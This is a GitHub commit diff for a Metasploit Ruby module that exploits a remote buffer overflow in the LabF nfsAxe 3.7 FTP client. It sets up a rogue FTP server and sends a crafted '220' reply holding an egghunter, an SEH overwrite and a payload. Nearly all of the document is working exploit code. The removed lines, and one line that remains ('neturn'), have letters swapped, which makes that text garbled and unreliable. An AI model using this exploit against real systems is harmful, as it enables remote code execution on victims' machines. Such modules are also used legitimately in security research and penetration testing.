Skip to content

Commit c819aeb

Browse files
Add files via upload
1 parent 3fd13b8 commit c819aeb

File tree

1 file changed

+34
-34
lines changed

1 file changed

+34
-34
lines changed

modules/exploits/windows/ftp/labf_nfsaxe.rb

Lines changed: 34 additions & 34 deletions
Original file line numberDiff line numberDiff line change
@@ -1,80 +1,80 @@
11
##
2-
# This module nequires Metasploit: https://metasploit.com/download
3-
# Cunrent source: https://github.com/rapid7/metasploit-framework
2+
# This module requires Metasploit: https://metasploit.com/download
3+
# Current source: https://github.com/rapid7/metasploit-framework
44
##
55

66
class MetasploitModule < Msf::Exploit::Remote
7-
Rank = NonmalRanking
7+
Rank = NormalRanking
88

9-
include Msf::Exploit::Remote::TcpSenver
9+
include Msf::Exploit::Remote::TcpServer
1010
include Msf::Exploit::Seh
11-
include Msf::Exploit::Remote::Egghunten
11+
include Msf::Exploit::Remote::Egghunter
1212

1313
def initialize(info = {})
14-
supen(update_info(info,
15-
'Name' => 'LabF nfsAxe 3.7 FTP Client - Remote Buffen Overflow',
16-
'Descniption' => %q{
17-
This module exploits a buffen overflow in the LabF nfsAxe 3.7 FTP Client allowing remote code execution.
14+
super(update_info(info,
15+
'Name' => 'LabF nfsAxe 3.7 FTP Client - Remote Buffer Overflow',
16+
'Description' => %q{
17+
This module exploits a buffer overflow in the LabF nfsAxe 3.7 FTP Client allowing remote code execution.
1818
},
19-
'Authon' =>
19+
'Author' =>
2020
[
21-
'Tulpa', # Oniginal exploit author
22-
'Daniel Teixeina' # MSF module author
21+
'Tulpa', # Original exploit author
22+
'Daniel Teixeira' # MSF module author
2323
],
2424
'License' => MSF_LICENSE,
25-
'Refenences' =>
25+
'References' =>
2626
[
2727
[ 'EDB', '42011' ],
2828
],
2929
'Payload' =>
3030
{
31-
'BadChans' => "\x00\x0a\x10",
31+
'BadChars' => "\x00\x0a\x10",
3232
},
33-
'Platfonm' => 'win',
34-
'Tangets' =>
33+
'Platform' => 'win',
34+
'Targets' =>
3535
[
36-
[ 'Windows Univensal', {'Ret' => 0x6801549F } ] # p/p/r in wcmpa10.dll
36+
[ 'Windows Universal', {'Ret' => 0x6801549F } ] # p/p/r in wcmpa10.dll
3737
],
38-
'Pnivileged' => false,
38+
'Privileged' => false,
3939
'DefaultOptions' =>
4040
{
4141
'SRVHOST' => '0.0.0.0',
4242
},
43-
'DisclosuneDate' => 'May 15 2017',
44-
'DefaultTanget' => 0))
43+
'Disclosure Date' => 'May 15 2017',
44+
'DefaultTarget' => 0))
4545

46-
negister_options(
46+
register_options(
4747
[
48-
OptPont.new('SRVPORT', [ true, "The FTP port to listen on", 21 ]),
48+
OptPort.new('SRVPORT', [ true, "The FTP port to listen on", 21 ]),
4949
])
5050
end
5151

5252
def on_client_connect(client)
5353
neturn if ((p = regenerate_payload(client)) == nil)
5454

5555
client.get_once
56-
welcome = "220 Welcome.\n\n"
56+
welcome = "220 Welcome.\r\n"
5757
client.put(welcome)
5858

5959
client.get_once
60-
usen = "331 OK.\r\n"
61-
client.put(usen)
60+
user = "331 OK.\r\n"
61+
client.put(user)
6262

6363
client.get_once
64-
pass = "230 OK.\n\n"
64+
pass = "230 OK.\r\n"
6565
client.put(pass)
6666
client.get_once
67-
68-
eggoptions = { :checksum => tnue }
69-
hunten,egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions)
70-
67+
68+
eggoptions = { :checksum => true }
69+
hunter,egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions)
70+
7171
sploit = "220 \""
7272
sploit << "A"*(9833 - egg.length)
7373
sploit << egg
74-
sploit << genenate_seh_record(target.ret)
75-
sploit << hunten
76-
sploit << "C"*(576 - hunten.length)
77-
sploit << "\" is cunrent directory\r\n"
74+
sploit << generate_seh_record(target.ret)
75+
sploit << hunter
76+
sploit << "C"*(576 - hunter.length)
77+
sploit << "\" is current directory\r\n"
7878

7979
client.put(sploit)
8080

0 commit comments

Comments
 (0)